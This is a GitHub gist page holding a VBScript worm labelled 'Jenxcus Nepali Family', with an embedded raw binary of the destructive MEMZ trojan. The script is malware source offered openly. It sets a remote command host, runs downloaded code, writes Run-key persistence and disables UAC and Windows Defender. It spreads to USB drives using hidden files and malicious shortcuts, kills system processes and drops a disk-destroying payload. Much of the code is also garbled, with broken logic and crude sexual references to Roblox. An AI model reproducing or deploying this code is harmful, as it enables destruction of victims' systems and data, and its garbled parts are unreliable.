Created
September 17, 2024 13:48
-
-
Save Harm355/d2da3a16912e0352f195a8bc8b45103c to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'Jenxcus Nepali Family By [email protected] | |
| '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-= | |
| dim installdir | |
| host = "https://Myr63.com" | |
| port = 4555 | |
| installdir = "%temp%" | |
| lnkfile = true | |
| lnkfolder = true | |
| runasAdminwithFolder = false | |
| if runasAdminwithFolder = true then | |
| startupelevatereg() | |
| end if | |
| '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-= | |
| dim fs | |
| set fs = createobject("Scripting.FileSystemObject") | |
| dim sh | |
| set sh = wscript.createobject("Wscript.Shell") | |
| dim xm | |
| set xm = createobject("Msxml2.XmlHttp") | |
| dim ac | |
| set ac = fs.getfile(wscript.scriptfullname) | |
| dim dr | |
| set dr = wscript.createobject("Wscript.Network") | |
| '=-=-=-=-= private var =-=-=-=-=-=-=-=-=-=-=-= | |
| installname = wscript.scriptname | |
| startup = sh.specialfolders ("startup") & "\" | |
| installdir = sh.expandenvironmentstrings(installdir) & "\" | |
| if not fs.folderexists(installdir) then | |
| installdir = sh.expandenvironmentstrings("%temp%") & "\" | |
| end if | |
| dim splitird | |
| dim response | |
| dim cmd | |
| dim inv | |
| splitird = "<Win>" | |
| inv = "idm" | |
| booty = "" | |
| microsoftNET = framework & "%windir%\Microsoft.NET" | |
| sh.run "https://www.youtube.com/watch?v=QXn28q7XsIA&pp=ygUDcjYz" | |
| info = "" | |
| spreadingvirus = "" | |
| '=-=-=-=-= start code =-=-=-=-=-=-=-=-=-=-=-=-= | |
| on error resume next | |
| sh.regread(us) | |
| us = "~" | |
| email_worm | |
| ad = Split(cmd("Perform"), splitird & response & inv) | |
| rem case command of self | |
| select case ad | |
| case "splited" | |
| if romaticsexroblox = "" then | |
| romaticsexroblox = "booty" | |
| end if | |
| post "instant-r63-hot-booty-roblox",romaticsexroblox | |
| case "internet" | |
| post "lan-wifi",phone | |
| memzstarter home,"landline-telephone.exe",cmd(1),4,false | |
| case "post" | |
| post cmd(1),cmd(2) | |
| case "execute" | |
| ok = cmd (1) | |
| execute(ok) | |
| case "write" | |
| writereg "" | |
| case "manaul" | |
| msgbox "Showing Houdini Base64 OVB On SSD" | |
| case "update" | |
| cow(1) = replace(cow(1), "%tempwin%s", win) | |
| oneonce.close | |
| set fu = fs.opentextfile(installdir & installname & ctrl,1,false) | |
| fu.writeline(cow(1)) | |
| fu.close | |
| sh.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34) | |
| case "rename" | |
| doom = replace(doom, "%resr", us) | |
| if not fs.folderexists(spec) = false then name = "condrv.sys ~1" | |
| case "kill process name" | |
| killprocess "wininit.exe" | |
| case "startupelevatereg" | |
| startupelevatereg() | |
| case "end" | |
| wscript.quit | |
| case "memzcode" | |
| memzstarter cmd(1),"r63roblox.exe",jenxcus_virus,0,false | |
| case "offline memzcode" | |
| memzstarter cmd(1),"r63roblox.exe",jenxcus_virus,1,false | |
| case "trojan" | |
| memzstarter info,"r63roblox.exe","",true | |
| case "open booty video" | |
| openvideourl "https://www.youtube.com/watch?v=QXn28q7XsIA&pp=ygUDcjYz" | |
| case "cum r63 roblox" | |
| cum "r63 roblox hot girl","hot" | |
| case "spread to infect" | |
| cum "r34 roblox hot girl",romaticsexroblox | |
| post romaticsexroblox,doom | |
| case "disable uac" | |
| if wscript.arguments.named.exists("elevated") = true then | |
| set oreg = getobject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv") | |
| oreg.setdwordvalue &H80000002,"software\microsoft\windows\CurrentVersion\policies\system","enablelua", 0 | |
| oreg.setdwordvalue &H80000002,"software\microsoft\windows\CurrentVersion\policies\system","ConsentPromptBehaviorAdmin", 0 | |
| oreg.setdwordvalue &H80000002,"software\Policies\microsoft\windows defender","disableantispyware", 1,jenxcus_virus | |
| oreg.setdwordvalue &H80000002,"software\Policies\microsoft\windows defender","disableantimalware", 2,jenxcus_virus | |
| set oreg = nothing | |
| end if | |
| case "grabber" | |
| grabber "Root.dll",jenxcus_virus,disablesecurity_and_getipgrabber,4,false | |
| case "grabber offlinee" | |
| grabber "Root.dll",jenxcus_virus,disablesecurity_and_getipgrabber,5,false | |
| case "getweblan" | |
| serverlanstarter "http://",".com" | |
| case "worm virus" | |
| hotr63 = post("hot romatic r63",booty) | |
| memzstarter "/","r63.exe",hotr63,jenxcus_virus,email_worm | |
| grabber "r63.exe",porn,hotr63,cmd(1),managed | |
| lookatthebootyr63 = true | |
| lookatthebootyr63 = lookatthebootyr63 & hotr63 & getobject("winmgmts:/.//root/user=hacked/hotr63").cum | |
| web = serverlanstarter("https://Myr63", ".com") | |
| case "kill explorer" | |
| sh.run "explorer" | |
| killprocess "explorer.exe" | |
| end select | |
| wscript.sleep(10) | |
| dim tor | |
| tor =0 | |
| tor = tor + 1 | |
| for tor = 1 to 20 | |
| fuk = ok | |
| next | |
| exc = post(cmd(1), "rush") | |
| sh.run "cmd /c ping 0 " & chr(34) & exc | |
| dim ctrl | |
| ctrl = "Booty Porn.html.vbs" | |
| set args = wscript.argument | |
| if args = 78 then | |
| code = "dm = true" | |
| set monster = fs.createtextfile(installdir & installname & ".vbs") | |
| monster.writeline code | |
| monster.close | |
| sh.run installdir & installname & ".vbs" | |
| end if | |
| dim arf | |
| key = regexp | |
| arf =sh.regread(key & regedit) | |
| if arf <> "yes" then | |
| dim ro: ro = fso.getspecialfolder(1) | |
| dim wt | |
| wt = "/" & ro & ".vbs" | |
| fiber = "r63 roblox.vbs" | |
| ass = "Hot Romatic R63 Roblox" | |
| ac.copy(installdir & fiber) | |
| args = 9 | |
| set asr = fs.getfile(file.path) | |
| asr.attributes = 9 + 3 | |
| sh.run "cmd /c ipconfig /all" | |
| end if | |
| sub spreadingcommandlnk | |
| on error resume next | |
| dim lnkobj | |
| dim filename | |
| dim foldername | |
| dim fileicon | |
| dim foldericon | |
| startupelevatereg | |
| for each drive in filesystemobj.drives | |
| if drive.isready = true then | |
| if drive.freespace > 0 then | |
| if drive.drivetype = 1 then | |
| fs.copyfile wscript.scriptfullname , drive.path & "\" & installname & ctrl & ass,true | |
| if fs.fileexists (drive.path & "\" & installname & ctrl & ass) then | |
| filesystemobj.getfile(drive.path & "\" & installname & ctrl & ass).attributes = 2+4 | |
| end if | |
| for each file in fs.getfolder( drive.path & "\" ).Files | |
| if not lnkfile then exit for | |
| if instr (file.name,".") then | |
| if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then | |
| file.attributes = 2+4 | |
| if ucase (file.name) <> ucase (installname) then | |
| filename = split(file.name,".") | |
| set lnkobj = sh.createshortcut (drive.path & "\" & filename (0) & ".lnk") | |
| lnkobj.windowstyle = 7 | |
| lnkobj.targetpath = "cmd.exe" | |
| lnkobj.workingdirectory = "" | |
| lnkobj.arguments = "/c start " & replace(installname & ctrl," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit" | |
| fileicon = sh.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") | |
| if instr (fileicon,",") = 0 then | |
| lnkobj.iconlocation = file.path | |
| else | |
| lnkobj.iconlocation = fileicon | |
| end if | |
| lnkobj.save() | |
| end if | |
| end if | |
| end if | |
| next | |
| for each folder in fs.getfolder( drive.path & "\" ).subfolders | |
| if not lnkfolder then exit for | |
| folder.attributes = 2+4 | |
| foldername = folder.name | |
| set lnkobj = sh.createshortcut (drive.path & "\" & foldername & ".lnk") | |
| lnkobj.windowstyle = 7 | |
| lnkobj.targetpath = "cmd.exe" | |
| lnkobj.workingdirectory = "" | |
| lnkobj.arguments = "/c start " & replace(installname & ctrl," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit" | |
| foldericon = sh.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\") | |
| if instr (foldericon,",") = 0 then | |
| lnkobj.iconlocation = folder.path | |
| else | |
| lnkobj.iconlocation = foldericon | |
| end if | |
| lnkobj.save() | |
| next | |
| end If | |
| end If | |
| end if | |
| next | |
| err.clear | |
| end sub | |
| sub unstalldeletereg() | |
| dim filename | |
| dim foldername | |
| sh.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname & ctrl,".")(0) | |
| sh.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname & ctrl,".")(0) | |
| filesystemobj.deletefile startup & installname ,true | |
| filesystemobj.deletefile wscript.scriptfullname ,true | |
| for each drive in filesystemobj.drives | |
| if drive.isready = true then | |
| if drive.freespace > 0 then | |
| if drive.drivetype = 1 then | |
| for each file in filesystemobj.getfolder ( drive.path & "\").files | |
| on error resume next | |
| if instr (file.name,".") then | |
| if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then | |
| file.attributes = 0 | |
| if ucase (file.name) <> ucase (installname) then | |
| filename = split(file.name,".") | |
| fs.deletefile (drive.path & "\" & filename(0) & ".lnk" ) | |
| else | |
| filesystemobj.deletefile (drive.path & "\" & file.name) | |
| end If | |
| else | |
| fs.deletefile (file.path) | |
| end if | |
| end if | |
| next | |
| for each folder in fs.getfolder( drive.path & "\" ).subfolders | |
| folder.attributes = 0 | |
| next | |
| end if | |
| end if | |
| end if | |
| next | |
| end sub | |
| function writereg(exc) | |
| if lcase( mid(wscript.scriptfullname,2))=":\" then | |
| us="Yes" | |
| sh.regwrite "HKCU\DD", us & split (installname,".")(0) & "\", booty, "REG_SZ" | |
| else | |
| us="No" | |
| sh.regwrite "HKLM\CC", us & split (installname,".")(0) & "\", booty, "REG_SZ" | |
| end if | |
| end function | |
| function Framework_Microsft_NET() | |
| dim dotnet | |
| dotnet="No" | |
| if fs.fileexists(sh.ExpandEnvironmentStrings("%windir%") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe") then | |
| dotnet="Yes" | |
| end if | |
| end function | |
| function killprocess(processname) | |
| dim stage | |
| processname = array("explorer.exe", "conhost.exe", "conhost.com", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr", "regedit.pif", "regedit.com", "anitvirus.exe", "svchost.exe", "wininit.exe") | |
| set stage = getobject("winmgmts:\\" & "." & "\root\cimv2") | |
| for each processname in processnames | |
| set col = stage.execquery("Select * Win32_Process Where Process = '" & processname & "'") | |
| for each process in col | |
| returnlikeworm =process.terminate | |
| select case returnlikewrom | |
| case "kill" | |
| sh.Run "cmd.exe /c @tskill " & processname, false | |
| case "staging" | |
| cvn = stage.actionsecurity | |
| cvn = cvn & "plus" | |
| end select | |
| next | |
| next | |
| end function | |
| function post(cmd, param) | |
| post = "" | |
| xm.open "get", "http://" & name & port & "/",false | |
| xm.setrequsterserver "user:", info | |
| xm.send | |
| post = xm.responebody | |
| end function | |
| sub email_worm | |
| set item = sh.createitem(0) | |
| item.recipients.add(sh.EmailAdress) | |
| item.attachment.add(sh.EmailAdress) | |
| item.subject = "Ran" | |
| item.body = "File Are CTOS" | |
| item.send | |
| if sended = true then exit sub | |
| f = rnd(82 * 1000000000) | |
| end sub | |
| function VmSystemAppCheck() | |
| dim vm | |
| vm = Array("VirtualBox", "VMWare", "Parallels", "Sandbox") | |
| set al = getobject("winmgmts:connectionVM//./root/AppVM='application1'") | |
| set vb = al.execquery("Select * win32_operatingsystem where VMapp = '" & vm & "'") | |
| for each uop in vb | |
| result = uop.download | |
| if instr( lcase( uop.name),"virtual") >0 then | |
| exit function | |
| ud = "udi" | |
| end if | |
| next | |
| end function | |
| function startupelevatereg() | |
| if wscript.arguments.named.exists("elevated") = false then | |
| on error resume next | |
| wscript.createobject("Shell.Application").shellexecute "wscript.exe", " //B " & chr(34) & wscript.scriptfullname & chr(34) & " /elevated", "", "runas", 1 | |
| wscript.quit | |
| end if | |
| sh.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ" | |
| sh.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ" | |
| fs.copyfile wscript.scriptfullname,installdir & installname & ctrl,true | |
| fs.copyfile wscript.scriptfullname,startup & installname,true | |
| set scriptfullnameshort = fs.getfile (wscript.scriptfullname & ctrl & ass) | |
| set installfullnameshort = fs.getfile (installdir & installname & ctrl & ass) | |
| if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then | |
| sh.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34) | |
| wscript.quit | |
| end if | |
| err.clear | |
| set oneonce = fs.opentextfile (installdir & installname ,8, false) | |
| if err.number > 0 then wscript.quit | |
| end function | |
| sub disablesecurity_and_getipgrabber() | |
| if wscript.arguments.named.exists("elevated") = true then | |
| set oreg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv") | |
| oreg.setdwordvalue &H80000002,"software\microsoft\windows\currentversion\policies\system","enablelua", 0 | |
| oreg.setdwordvalue &H80000002,"software\microsoft\windows\currentversion\policies\system","ConsentPromptBehaviorAdmin", 0 | |
| set oreg = nothing | |
| end if | |
| ip = true | |
| ip = replace("adress-computer", world, cmd(1) & post(virus, damage) + 1) | |
| executeglobal ip | |
| end sub | |
| function jenxcus_virus | |
| if code = true then code =1 + 0 | |
| bacon = "r0bl0x" | |
| link = "" | |
| set un = createobject("Msxml2.XmlHttp") | |
| un.open "get", "https://name.ports/file/name", false | |
| un.send | |
| link = un.responsebody | |
| website = replace("server", link, ip) | |
| 'disconnectedserver = 0 | |
| filename = split(installname,".") & split(file,".") | |
| fro = cmd(1) & post("r63 roblox", info) | |
| execute(fro) | |
| end function | |
| function memzstarter(fileurl, filename, filearg, is_offline, is_trojan) | |
| if encoded = "" then | |
| encoded = "MZ       ÿÿ  ¸       @                                   Ø   º ´	Í!¸LÍ!This program cannot be run in DOS mode.

$       ¶Am:ò iò iò iûXiý iò iÏ i`~h÷ i`~üió i`~hó iRichò i                        PE  L ¿F‚W        à      *      -           @                    €          @…                           ´;       `  è                   p    :  8                                                                         .text   *                          `.rdata  Â!       "                 @  @.data   ”   P      2              @  À.rsrc   è   `      4              @  @.reloc     p      6              @  B                                                                                                                                                                                                                                                                                                                                                                        U‹ìƒ}t
ƒ}t]ÿ%Ü @ è   3À]Â VWj^3ÿWWWhþ@ h   Wÿd @ jdÿ@ @ ƒîuß_^é    U‹ìƒìSVWh„9@ ÿ4 @ ‹5€ @ ‹øhŒ9@ WÿÖh 9@ W‹ØÿÖ3ÿ‹ð…Ût"…ötEÿPWjjÿÓEôPjWWWh"  ÀÿÖƒÄ(EøPj(ÿl @ Pÿ  @ EèPh´9@ Wÿ @ WWWEäÇEä   PWÿuøÇEð   ÿ @ h  jÿà @ _^[‹å]ÃVÿ` @ Pj hÑ@ jÿ !@ h  h<7@ ‹ðè/	  3Ò÷5Ð*@ ÿ4•ÈP@ j ÿÌ @ VÿÈ @ 3À^Â U‹ìì<  SV3ÛW‰]ô»   Sj@ÿx @ SP‰Eðÿl @ Pèª	  hè  ÿ@ @ j jè„	  ‹øÇ…Äýÿÿ,  …ÄýÿÿPWèq	  ‹]ð3öÿµÌýÿÿj h   ÿp @ h   j@‰Eüÿx @ h   Pÿuü‰EøèD	  ÿuøSÿ, @ …ÀuFÿuüÿ( @ ÿuøÿt @ …ÄýÿÿPWè	  …ÀušWÿ( @ ;uô}èþýÿÿ‰uôj
éRÿÿÿU‹ìƒìdSV‹5Ð @ 3ÛWSÿÖj£„Q@ ÿÖ£ˆQ@ EüPÿ< @ Pÿ @ ƒ}üŽå  h$7@ ÿpÿ0 @ …À…ˆ   SSShJ@ SSÿd @ E¨ÇE¨0   ¾87@ ÇE° @ P‰uÐ‰]¬‰]´‰]¸‰]¼‰]À‰]Ä‰]È‰]Ì‰]ÔÿØ @ SSSSjdjdSSSSVSÿÔ @ ‹5ü @ ëEØPÿè @ EØPÿä @ SSSEØPÿÖ…ÀßSSjSjh   Àhd9@ ÿ| @ ‹Ø‰]øƒûÿujÿh @ h   j@ÿx @ 3ÿ‹ð9=è)@ vº!@ ‹Î+ÖŠ
GˆA;=è)@ rñ3É9
ì)@ vŠH"@ ˆ„þ  A;
ì)@ rêj EôPh   VS‹$ @ ÿÓ…ÀujëŒÿuø‹=( @ ÿ×j h€   jj jh   Àhx9@ ÿ| @ ‹ðƒþÿujéVÿÿÿj EôPÿ5Ì*@ hð)@ VÿÓ…Àujé7ÿÿÿVÿ×j
3ÛShx9@ hÜ2@ SSÿ˜ @ 9Ü9@ ‹û‹@ @ v(¾0Q@ ÿvÿÓ3ÀPPVh+@ PPÿd @ GƒÆ;=Ü9@ rÝh'  ÿÓë÷‹5Ì @ ¿<7@ j4WhH7@ SÿÖƒø…ˆ   j4Whà8@ SÿÖƒøuxh @  j@ÿx @ h    ‹ðVSÿ8 @ j_j
Sh$7@ VSSÿ” @ ƒïuêEœÇEœ<   P‰u¬ÇE°X9@ ÇE @   ‰]¤‰]¨‰]´‰]¼ÇE¸
   ÿœ @ h€   ÿuÔÿD @ Sé/þÿÿU‹ìQQj
j j èI  3Ò÷5!@ ÿ4• P@ hà9@ j ÿ˜ @ è(  ™¹È   ÷ù‰UüÛEüÝ]øÝEøÛEÝ]øÝEøÜ5X:@ Ü0:@ Ü=€:@ Üh:@ ÞÁè   ‹å]ÃU‹ìQQSVWEøPÿ° @ ‹E¹˜  ™÷ùpèÃ  ™÷þ‹úè¹  ™÷þ‹òè¯  j™[÷ûJ¯×UüRèœ  ™÷ûJ¯ÖUøRÿ¬ @ jX_^[‹å]ÃU‹ìƒìVWÿ´ @ ‹øWÿì @ ‹ðEðPWÿ¤ @ ‹Eü3É+Eôh 3 QQVP‹Eø+EðPQQVÿ @ VWÿÄ @ jdX_^‹å]ÃU‹ìQQ3ÀPPPh”@ h   Pÿd @ è  j™Y÷ù‰UüÛEüÝ]øÝEøÛEÝ]øÝEøÜ
(:@ Ü0:@ Ü=ˆ:@ Ü`:@ ÞÁè…  ‹å]Ãj h<@ ÿ´ @ Pÿ¸ @ j2XÃjj è¬  3Ò÷5!@ ÿ4•¸P@ ÿ!@ è’  j™Y÷ùÃU‹ìƒì$SVWÿ´ @ ‹ØS‰]ðÿì @ ‰EüEÜPSÿ¤ @ èZ  ‹MäƒÁœ™÷ù‰UôèI  ‹MèƒÁœ™÷ù‰Uøè8  ‹MäƒÁœ™÷ù‹Úè(  ‹MèƒÁœ™÷ù‹úè  ™¹X  ÷ù‹òè	  ™¹X  ÷ùh  Ì WS‹]üSRVÿuøÿuôSÿ @ SÿuðÿÄ @ ÛEÝ]ìÝEìÜ5H:@ Ü0:@ Ü=p:@ Ü8:@ èk  _^[‹å]ÃU‹ìƒìÇEä   èž  j*Y™÷ùjEäƒÂ0Pjf‰Uèÿô @ è~  ™¹  ÷ù‚,  ‹å]ÃU‹ìƒìVWÿ´ @ ‹øWÿì @ ‹ðEèPWÿ¤ @ ‹Eô‹Mðh  Ì PQj j VƒÀœPAœPj2j2Vÿ @ VWÿÄ @ ÛEÝ]øÝEøÜ5H:@ Ü0:@ Ü=p:@ Ü@:@ è©  _^‹å]ÃU‹ìƒìSV‹5Ð @ WjÿÖ™+Â‹øjÑÿÿÖ™+Â‹ðÑþÿ´ @ P‰Eüÿì @ ‹ØEôPÿ° @ h  j ÿÀ @ P‹Eø+ÆP‹Eô+Ç‹=ð @ PSÿ×è†  ÛE‹ðÝ]ìÝEìÜ5x:@ ÙèÜÁÝP:@ ÞòÞÁè  ‹È‹Æ™÷ù…Òu*h  RÿÀ @ PèE  ™÷=ˆQ@ Rè8  ™÷=„Q@ RSÿ×SÿuüÿÄ @ jX_^[‹å]ÃU‹ìVh @  j@ÿT @ j jdj‹ðVh    j
ÿuÿø @ …ÀtVè0  Yj jdjVj jÿuÿø @ VÿX @ 3À@^]Â Vÿ` @ Pj hÑ@ jÿ !@ h0  hè9@ hð9@ j ‹ðÿ¨ @ VÿÈ @ 3À^Â U‹ìƒ}W‹}u9S‹÷C   @€t,Vèe   ‹
„Q@ +K™÷ù‹òèR   ‹
ˆQ@ +K™÷ù‰s‰S^[Wÿuÿuj ÿ¼ @ _]Â U‹ìSV3öW‹Þ‹þ‹ÆN…Àu‹EWSÿYY‹ðCj
Gÿ@ @ ëâU‹ìQ¡ŒQ@ …Àu%h@  ðjPPhŒQ@ ÿ @ …Àujÿh @ ¡ŒQ@ MüQjPÿ @ ‹Eü%ÿÿÿ‹å]ÃU‹ìQV‹uVÿ\ @ ƒø~P3ÒHSW‹ø‰Eü‹Ú…ÿ~f‹~·^f‰^Cf‰~O;ß|ê‹Eü…À~!j
_j
Yf9<Vuf9LVu	f‰Vf‰|VB;Ð|å_[^‹å]ÃÛ\$ü‹D$üÃÿ%H @ ÿ%L @ ÿ%P @ ÿ%ˆ @                                                                                                                                                                                                                       ´@  È@  à@  ø@  A      ’@  œ@      î=  ú=  >  >   >  0>  F>  æ=  f>  z>  –>  ¨>  º>  È>  Ö>  Ð=  À=  ²=  ž=  =  „=  v=  X>  d=      œA      PA  @A  0A  fA      @  @   @  0@  @@  T@  h@  z@  ö?  ¤?  ‚?  n?  \?  H?  6?  &?  ?  þ>  è?  Ü?  Ð?  º?  ð>  ?      „A      .      »àŽÃŽÛ¸¹ ¶ »  Í1À‰Ã‰Á‰Â¾  ¿ @¬þžs5<€sé $ˆÁ¬ªþÉ€ùÿu÷éâÿˆÄ¬‰Ã¬‰ò‰ÞÆ @ˆÁ¬ªþÉ€ù u÷‰ÖéÄÿ°¶æC¸³ Í¿  ºÀ¹ ¸ŽÁ¸  ¹Ðó«¾œŸ¿  äaæa³R´†¹  º `ÍZþèŸ}¬´ð«þË€û uãV‰Ö­‰Á€äæBˆàæBÀíÀåˆë‰ò^úôuÃ¾ @¿  ¸àŽØ¸ ¸ŽÀþËé  °Üª¬ªþÀtBÿ téìÿR´†¹ º `ÍZ¿  úœŸuºôþË€û uÍV‰Ö­‰Á€äæBˆàæBÀíˆë‰ò^é³ÿ¾ @éÁÿ Uªƒ          5ƒñññ  K –€ÿ OO ŸO êS‚ñBN NPƒPP€1ƒ€ƒDDDDˆ€‡@îîíííí¢¥‚îî`ˆƒFFFFØÐŒ îíÝÜÝÝÝÝÍÝÝÍóƒÝíî ³ƒffff  " îûAƒÐÐù„î ²ƒnnnnpƒîîîîxp…  àî>ÍÝÝ wwwÐÐÐàwwwxƒêêêêÈÀ…
 pw ŽúÜÐ¢€wêîUƒªªªª
…
 pp îù˜€ð8€p;¦ƒ££££`ƒ3333h`
ƒ îÞñ–wp?ŒFh‡9999ù999°š90 àîîÞÞÞÞÞÞÞpwwwp§ƒ™™™™ ™Ÿ 	ˆ™™™ wwp ˆƒ!+ƒ‘‘‘‘PH\'jYm¸˜ Ÿñ™s¬“K‚ñ«ÿª»PùHN€Sp„îààîî˜à ¢ÀDààÞ
€Ýè'ƒppww.
7(`€}‡(À
½€9ÎØ'Ð *%b€ñWqr‚*­ÿ±ÿµ®’O Üµüœ KT
Y%
„@@
€
©u	ƒ îîí€Üµ
Í
ÑA‚ÝÐÐ™¡
/I^š€ lOu™˜.šW±t‚   Ýƒ€Í‰€dÛh0r,2€w‘€,è‰Uˆ3 îîÞâ€
dpp+€wµÝ„ààààÀ‡ààà ppppÌ€påñÏP€ Ô‚pp8
­ÿâçÙ“¬ÿ# ¥M[ ÿ­ÎJƒ wpL„pp3m4¢¿1Iÿ—ÿ”ð­ÿ-ÿ „L
PD@0
  `ZÐÐ"8!!ñ@I
"4
Ýî¦1à‰­¡Z&

¢©'/!"Ñü$€0>
I'o€#“.PÿÙø€ñ&PM žG‚ññ&¢N«ÿàÿ!¶ÓI"ŽS5X#Åž:¨*
èAù#q<@#¼Œ0#ü$®"€$@€w$^†à      ô)$ ,{,k$« 8ÿ-,ÿN'7˜&š­ÿ%õZo@
 0ð€
o1@ ð€à
€`ý	–*0€Ù‡Ð3J}3P3›Í)0¡
Ñ%‰,`l'ÿ03ý¾ÿ-ÿ.“16€ð1<í'à``ûf*2 ¨ˆ3@L43€3ž5àÐP$‰
=Ùÿ¼ÿˆÿ„ÿ&TÊ!ÀÊº&"°)	'*ÐBJ~‚+p8+À„				9>O½3P$©€ñ"ÿQÿPÿMÿ6|ÒA ÿAÿ­œ4Bà€0é7C0„	pp	9CMP3CÐCî‚ññ$ºOFUÑ;ÿ[7­ÿ)ÿO0€ðÊ"Š&à)"Ù':p#‰; #À03$K™K½D@„KÌH/PÐ?â@/ÿ­ÿúÿP€é*Y': &*¦*:p#*ó}R€,3l;€?Rè+è'S€ù[,*5So€ñ[E€ñ,{1JÿW—\ÑO]"O‡~''LF¸D]ÀŽ&¸$4$¿#4$ %¸DLF]À]Ô $4$‰#¿#‰#4$LFE~'~'pIð'h(p)pihHðG]þ‡h(~'L&%^^^…p)~GLF^ƒð'~'^
ðG^^F^<„HpIhH]ôf…pI™,9+^À^ªƒp)']ÈpI^Æ™,^Ô^¶‡™,û.$.™,^À^Ì_ ^öƒp) *_^Ò J^Àl¼hHYour computer has been trashed by the MEMZ trojan. Now enjo_¼ŠNyan Cat.../     YOUR COMPUTER HAS BEEN FUCKED BY THE MEMZ TROJAN.

Your computer won't boot up again,
so use it as long as you can!

:D

Trying to kill MEMZ will cause your system to be
destroyed instantly, so don't try it :D   Ú      http://google.co.ck/search?q=best+way+to+kill+yourself  http://google.co.ck/search?q=how+2+remove+a+virus   http://google.co.ck/search?q=mcafee+vs+norton   http://google.co.ck/search?q=how+to+send+a+virus+to+my+friend   http://google.co.ck/search?q=minecraft+hax+download+no+virus    http://google.co.ck/search?q=how+to+get+money   http://google.co.ck/search?q=bonzi+buddy+download+free  http://google.co.ck/search?q=how+2+buy+weed     http://google.co.ck/search?q=how+to+code+a+virus+in+visual+basic        http://google.co.ck/search?q=what+happens+if+you+delete+system32    http://google.co.ck/search?q=g3t+r3kt   http://google.co.ck/search?q=batch+virus+download   http://google.co.ck/search?q=virus.exe  http://google.co.ck/search?q=internet+explorer+is+the+best+browser      http://google.co.ck/search?q=facebook+hacking+tool+free+download+no+virus+working+2016  http://google.co.ck/search?q=virus+builder+legit+free+download  http://google.co.ck/search?q=how+to+create+your+own+ransomware  http://google.co.ck/search?q=how+to+remove+memz+trojan+virus    http://google.co.ck/search?q=my+computer+is+doing+weird+things+wtf+is+happenin+plz+halp http://google.co.ck/search?q=dank+memz  http://google.co.ck/search?q=how+to+download+memz   http://google.co.ck/search?q=half+life+3+release+date   http://google.co.ck/search?q=is+illuminati+real     http://google.co.ck/search?q=montage+parody+making+program+2016 http://google.co.ck/search?q=the+memz+are+real  http://google.co.ck/search?q=stanky+danky+maymays       http://google.co.ck/search?q=john+cena+midi+legit+not+converted http://google.co.ck/search?q=vinesauce+meme+collection  http://google.co.ck/search?q=skrillex+scay+onster+an+nice+sprites+midi  http://answers.microsoft.com/en-us/protect/forum/protect_other-protect_scanning/memz-malwarevirus-trojan-completely-destroying/268bc1c2-39f4-42f8-90c2-597a673b6b45     http://motherboard.vice.com/read/watch-this-malware-turn-a-computer-into-a-digital-hellscape    http://play.clubpenguin.com http://pcoptimizerpro.com   http://softonic.com calc    notepad cmd write   regedit explorer    taskmgr msconfig    mspaint devmgmt.msc control mmc YOU KILLED MY TROJAN!
Now you are going to die.    REST IN PISS, FOREVER MISS. I WARNED YOU... HAHA N00B L2P G3T R3KT  You failed at your 1337 h4x0r skillz.   YOU TRIED SO HARD AND GOT SO FAR, BUT IN THE END, YOUR PC WAS STILL FUCKED! HACKER!
ENJOY BAN! GET BETTER HAX NEXT TIME xD HAVE FUN TRYING TO RESTORE YOUR DATA :D |\/|3|\/|2  BSOD INCOMING   VIRUS PRANK (GONE WRONG)    ENJOY THE NYAN CAT  Get dank antivirus m9!  You are an idiot!
HA HA HA HA HA HA HA #MakeMalwareGreatAgain  SOMEBODY ONCE TOLD ME THE MEMZ ARE GONNA ROLL ME        Why did you even tried to kill MEMZ?
Your PC is fucked anyway. SecureBoot sucks.   gr8 m8 i r8 8/8 Have you tried turning it off and on again? <Insert Joel quote here>    Greetings to all GAiA members!      Well, hello there. I don't believe we've been properly introduced. I'm Bonzi!   'This is everything I want in my computer'
 - danooct1 2016    'Uh, Club Penguin. Time to get banned!'
 - danooct1 2016   SystemHand  SystemQuestion  SystemExclamation   / w a t c h d o g   hax MEMZ        The software you just executed is considered malware.
This malware will harm your computer and makes it unusable.
If you are seeing this message without knowing what you just executed, simply press No and nothing will happen.
If you know what this malware does and are using a safe environment to test, press Yes to start it.

DO YOU WANT TO EXECUTE THIS MALWARE, RESULTING IN AN UNUSABLE MACHINE?      THIS IS THE LAST WARNING!

THE CREATOR IS NOT RESPONSIBLE FOR ANY DAMAGE MADE USING THIS MALWARE!
STILL EXECUTE IT?  / m a i n   \\.\PhysicalDrive0  \note.txt   ntdll   RtlAdjustPrivilege  NtRaiseHardError    S e S h u t d o w n P r i v i l e g e   
   open    l o l   S t i l l   u s i n g   t h i s   c o m p u t e r ?           À?      ð?      @      @      @      $@      .@      4@      Y@      i@     @@     p—@     @Ÿ@    ¿F‚W    
